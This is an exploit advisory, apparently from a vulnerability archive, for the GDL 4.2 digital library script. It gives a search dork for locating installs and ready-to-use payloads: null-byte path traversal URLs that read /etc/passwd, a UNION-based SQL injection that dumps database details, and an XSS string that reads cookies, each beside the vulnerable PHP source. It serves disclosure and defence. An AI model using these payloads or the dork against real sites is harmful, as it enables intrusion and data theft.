GDL 4.2 XSS / SQL Injection / Traversal

2014.02.28
Credit: ByEge
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79
CWE-22
Dork: \"Powered by GDL 4.2\" And \"gdl.php?mod=browse\"

-> Title : GDL 4.2 Multiple Vulnerabilities -> Down. Script : http://kmrg.itb.ac.id/ - http://kmrg.itb.ac.id/gdl42.zip -> Author : ByEge -> Home : http://byege.blogspot.com.tr/ -> Tested : Apache/2.2.22 (Win32) PHP/5.4.3 -> Date : 26/02/2014 -> Google Dork : "Powered by GDL 4.2" And "gdl.php?mod=browse" -> Thanks : F0RTYS3V3N - Cyb3rking - ameN -> Keyfi : http://www.youtube.com/watch?v=wKGMk56zSPI --> Yaz dostum boa gemi mre yaam denir mi ? -> Not : Kendini gelitirmek isteyen arkadalar kod analizi iin kullanabilirsiniz scripti, bir ok gvenlik zaafiyeti var. ################################### #Directory traversal vulnerability# ################################### http://localhost/gdl.php?newlang=../../../../../../../../../../etc/passwd%00 http://localhost/index.php?newlang=../../../../../../../../../../etc/passwd%00 Line : gdl42/class/session.php 96 - 99 parameter : newlang // Setting bahasa $lang = $_COOKIE['gdl_lang']; $newlang = $_GET['newlang']; if (isset($newlang)) { if (file_exists("./lang/$newlang.php")) { setcookie("gdl_lang",$newlang,time()+($gdl_sys['page_caching'] * 60)); $gdl_content->language=$newlang; } else { setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60)); $gdl_content->language=$gdl_sys['language']; } } elseif (isset($lang)) { $gdl_content->language=$lang; }else{ setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60)); $gdl_content->language=$gdl_sys['language']; } } function set_theme(){ global $gdl_content, $gdl_sys; -------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------- http://localhost/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00 http://localhost/index.php?newtheme=../../../../../../../../../../etc/passwd%00 Line : gdl42/class/session.php 120 - 123 parameter : newtheme $theme = $_COOKIE['gdl_theme']; $newtheme = $_GET['newtheme']; if (isset($newtheme)) { if (file_exists("./theme/$newtheme/theme.php")) { setcookie("gdl_theme",$newtheme,time()+($gdl_sys['page_caching'] * 60)); $gdl_content->theme=$newtheme; } else { setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60)); $gdl_content->theme=$gdl_sys['theme']; } } elseif (isset($theme)) { $gdl_content->theme=$theme; }else{ setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60)); $gdl_content->theme=$gdl_sys['theme']; } } function login($userid,$password) { global $gdl_auth,$gdl_sys; -------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------- ############################# #SQL Injection vulnerability# ############################# http://localhost/download.php?id=injecthere Line : gdl42/download.php 18 - 24 parameter : id $file_id = $_GET['id']; function download_redirect(){ global $file_id,$gdl_db,$gdl_metadata,$gdl_publisher,$gdl_session,$gdl_publisher2; $dbres = $gdl_db->select("relation","part,path,identifier,uri","relation_id=$file_id"); $file_target=@mysql_result($dbres,0,"path"); $file_part=@mysql_result($dbres,0,"part"); $publisher = $gdl_metadata->get_publisher(@mysql_result($dbres,0,"identifier")); -------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------- ################################### #Blind SQL Injection vulnerability# ################################### http://localhost/gdl.php?mod=browse&newlang=english&op=comment&page=read&id=injecthere Line : gdl42/main.php 119 parameter : id if ((file_exists("./theme/".$gdl_content->theme."/".$gdl_content->theme."_print.css"))&& ($_GET['mod']== "browse") && ($_GET['op']=="read") && (! empty ($_GET['id']))) -------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------- ######################################## #Cross site scripting xss vulnerability# ######################################## http://localhost/gdl.php?mod=search&action=ByEge&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK Line : module/search/function.php 38 parameter : keyword ############################################################################################################################################################################### ############################################################################################################################################################################### Test Vulnerability : http://server/download.php?id=null/**/and/**/true/**/UNION/**/SELECT/**/CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2-- http://server/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00 http://server/gdl.php?newlang=../../../../../../../../../../etc/passwd%00 http://server/gdl.php?mod=search&action=folks&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top